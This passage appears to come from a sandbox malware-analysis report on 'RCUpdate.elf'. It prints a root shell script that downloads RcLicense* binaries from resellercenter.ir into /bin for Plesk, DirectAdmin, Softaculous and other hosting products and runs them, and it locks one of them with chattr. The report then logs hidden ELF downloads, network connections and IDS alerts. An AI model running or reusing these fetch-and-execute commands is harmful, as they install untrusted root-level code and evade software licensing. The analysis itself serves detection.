\"\${RED}Softaculous did not installed\. Have you enabled Ioncube loader ? Please check : https://www\.softaculous\.com/docs/admin/installing-softaculous/ \${NC}\" exit 1; fi fi wget -O /bin/RcLicenseSoftaculous https://sys\.resellercenter\.ir/RcLicenseSoftaculous > /dev/null 2>&1 chmod +x /bin/RcLicenseSoftaculous RcLicenseSoftaculous echo \"\${GREEN}Softaculous licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"sitepad\" ]; then echo \"\${GREEN}Installing Sitepad licensing system \.\.\. \${NC}\" wget -O install\.sh http://files\.sitepad\.com/install\.sh chmod 755 install\.sh \./install\.sh if [ \! -d /usr/local/sitepad ] then echo \"\${RED}SitePad did not installed\. Have you enabled Ioncube loader ? Please check : https://sitepad\.com/docs/admin/installing-sitepad/ \${NC}\" exit 1; fi wget -O /bin/RcLicenseSitepad https://sys\.resellercenter\.ir/RcLicenseSitepad > /dev/null 2>&1 chmod +x /bin/RcLicenseSitepad RcLicenseSitepad echo \"\${GREEN}Sitepad licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"virtualizor\" ]; then echo \"\${GREEN}Installing Virtualizor licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseVirtualizor https://sys\.resellercenter\.ir/RcLicenseVirtualizor > /dev/null 2>&1 chmod +x /bin/RcLicenseVirtualizor RcLicenseVirtualizor echo \"\${GREEN}Virtualizor licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cpguard\" ]; then echo \"\${GREEN}Installing CPGuard licensing system \.\.\. \${NC}\" if [ -d /usr/local/cpanel ] then whmapi1 set_tweaksetting key=phploader value=ioncube,sourceguardian > /dev/null 2>&1 fi if [ \! -d /etc/cpguard ] then cd /usr/local/src && rm -f cpguard\.sh && curl -o cpguard\.sh -L https://mirror\.resellercenter\.ir/cpguard\.sh && chmod +x cpguard\.sh && \./cpguard\.sh install fi wget -O /bin/RcLicenseCPGuard https://sys\.resellercenter\.ir/RcLicenseCPGuard > /dev/null 2>&1 chmod +x /bin/RcLicenseCPGuard RcLicenseCPGuard echo \"\${GREEN}CPGuard licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"lslb\" ]; then echo \"\${GREEN}Installing LiteSpeed Load Balancer licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseLSLB https://sys\.resellercenter\.ir/RcLicenseLSLB > /dev/null 2>&1 chmod +x /bin/RcLicenseLSLB RcLicenseLSLB echo \"\${GREEN}LiteSpeed Load Balancer licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"whmreseller\" ]; then echo \"\${GREEN}Installing WHMReseller licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseWHMReseller https://sys\.resellercenter\.ir/RcLicenseWHMReseller > /dev/null 2>&1 chmod +x /bin/RcLicenseWHMReseller RcLicenseWHMReseller echo \"\${GREEN}WHMReseller licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"plesk\" ]; then echo \"\${GREEN}Installing Plesk licensing system \.\.\. \${NC}\" wget -O /bin/RcLicensePlesk https://sys\.resellercenter\.ir/RcLicensePlesk > /dev/null 2>&1 chmod +x /bin/RcLicensePlesk timeout 1 RcLicensePlesk &> /usr/local/RCBIN/\.file_status_rc if grep -q \"dumped core\" /usr/local/RCBIN/\.file_status_rc; then wget -O /bin/RcLicensePlesk https://sys\.resellercenter\.ir/RcLicensePlesk2 > /dev/null 2>&1 chmod +x /bin/RcLicensePlesk > /dev/null 2>&1 chattr +ia /bin/RcLicensePlesk > /dev/null 2>&1 chattr2 +ia /bin/RcLicensePlesk > /dev/null 2>&1 comp0 +ia /bin/RcLicensePlesk > /dev/null 2>&1 fi RcLicensePlesk echo \"\${GREEN}Plesk licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"directadmin\" ]; then echo \"\${GREEN}Installing DirectAdmin licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseDA https://sys\.resellercenter\.ir/RcLicenseDA > /dev/null 2>&1 chmod +x /bin/RcLicenseDA RcLicenseDA echo \"\${GREEN}DirectAdmin licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"dareseller\" ]; then echo \"\${GREEN}Installing DAReseller licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseDAReseller https://sys\.resellercenter\.ir/RcLicenseDAReseller > /dev/null 2>&1 chmod +x /bin/RcLicenseDAReseller RcLicenseDAReseller echo \"\${GREEN}DAReseller licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"osm\" ]; then echo \"\${GREEN}Installing OSM licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseOSM https://sys\.resellercenter\.ir/RcLicenseOSM > /dev/null 2>&1 chmod +x /bin/RcLicenseOSM RcLicenseOSM echo \"\${GREEN}OSM licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"cxs\" ]; then echo \"\${GREEN}Installing CXS licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseCXS https://sys\.resellercenter\.ir/RcLicenseCXS > /dev/null 2>&1 chmod +x /bin/RcLicenseCXS RcLicenseCXS echo \"\${GREEN}CXS licensing system has been installed\. Enjoy \${NC}\" exit 0 fi if [ \"\${cmd}\" = \"whmsonic\" ]; then echo \"\${GREEN}Installing WHMSonic licensing system \.\.\. \${NC}\" wget -O /bin/RcLicenseWHMSonic https://sys\.resellercenter\.ir/RcLicenseWHMSonic > /dev/null 2>&1 chmod +x /bin/RcLicenseWHMSonic RcLicenseWHMSonic echo \"\${GREEN}WHMSonic licensing system has been installed\. Enjoy \${NC}\" exit 0 fi echo \"\${RED}This product does not exist\! \${NC}\" exit 1 fi " /tmp/RCUpdate.elf | /usr/bin/dash | — | sudo |
User: root Integrity Level: UNKNOWN Exit code: 256 | ||||
| 40670 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 40671 | -bash --login -c \/tmp\/RCUpdate\.elf | /usr/bin/bash | — | dash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
| 40672 | sh -c "cat /usr/etc/debuginfod/*\.urls 2>/dev/null" | /usr/bin/dash | — | bash |
User: root Integrity Level: UNKNOWN Exit code: 256 | ||||
| 40673 | tr \n " " | /usr/bin/tr | — | bash |
User: root Integrity Level: UNKNOWN Exit code: 0 | ||||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 40682 | wget | /root/.libcrypt.so.1_Downloaded | binary | |
MD5:— | SHA256:— | |||
| 40685 | wget | /root/.libfreebl3.so_Downloaded | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 204 | 185.125.190.97:80 | http://connectivity-check.ubuntu.com/ | unknown | — | — | whitelisted |
40685 | wget | GET | 200 | 104.26.5.214:80 | http://mirror.resellercenter.ir/libfreebl3.so | unknown | — | — | unknown |
40682 | wget | GET | 200 | 104.26.4.214:80 | http://mirror.resellercenter.ir/libcrypt.so.1 | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
484 | avahi-daemon | 224.0.0.251:5353 | — | — | — | unknown |
— | — | 91.189.91.49:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted |
— | — | 185.125.190.97:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted |
— | — | 37.19.194.80:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted |
512 | snapd | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
512 | snapd | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
40682 | wget | 104.26.4.214:80 | mirror.resellercenter.ir | CLOUDFLARENET | US | unknown |
40685 | wget | 104.26.5.214:80 | mirror.resellercenter.ir | CLOUDFLARENET | US | unknown |
512 | snapd | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
512 | snapd | 185.125.188.55:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted |
Domain | IP | Reputation |
|---|---|---|
connectivity-check.ubuntu.com |
| whitelisted |
google.com |
| whitelisted |
odrs.gnome.org |
| whitelisted |
api.snapcraft.io |
| whitelisted |
mirror.resellercenter.ir |
| unknown |
173.100.168.192.in-addr.arpa |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
40682 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |
40685 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP |